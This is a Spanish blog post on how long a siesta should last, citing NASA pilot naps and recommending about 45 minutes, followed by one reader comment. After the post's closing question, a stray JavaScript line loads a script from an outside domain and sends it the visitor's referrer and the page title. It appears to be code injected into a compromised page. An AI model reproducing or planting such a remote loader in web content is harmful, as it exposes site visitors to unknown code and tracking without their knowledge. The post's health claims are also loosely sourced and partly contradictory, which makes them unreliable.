Salud y belleza » Bienestar, Salud, salud mental

La siesta: ¿cuánto debe durar?

1 Comentario

La típica siesta española es un breve descanso que suele hacerse después del almuerzo durmiendo algunas horas y es una tradición en muchos lugares. Además, la siesta según algunas investigaciones es muy saludable, ideal también para retomar fuerzas y seguir el día con energía. Pero lo que muchos no saben con seguridad es el tiempo que es aconsejable que dure una siesta.

siesta-duracion

Los expertos aseguran que una siesta de una hora hace que aguantemos alerta otras 10 horas, aunque depende también de la calidad de la siesta. La NASA pone el ejemplo de un piloto, que si duerme unos 30 minutos mientras el copiloto maneja el avión, esta siesta le ayuda a aumentar después la alerta durante el resto del viaje. Es muy importante en situaciones tan arriesgadas como esta. Además, también se dice que ayuda a mejorar la memoria y la capacidad de aprendizaje.

Sin embargo, también hay contradicciones. Si dormimos una siesta demasiado larga podríamos entrar en una fase de somnolencia que nos impediría seguir con un buen ritmo en las actividades rutinarias. Los expertos aseguran que para recuperar fuerzas con 45 minutos es suficiente.

duracion-siesta

También hay que controlar cuánto se duerme por la noche o si se hace rápidamente o se padece insomnio para averiguar si la siesta podría estar modificando ciertos hábitos del sueño.

¿Cuánto tiempo suele durar tu siesta?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • Iker said:

    Yo no consigo conciliar el sueño después de comer, y eso que no duermo ni siete horas y después no trabajo, pero bueno quizás también sea bueno porque así están las horas del día establecidas no?

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.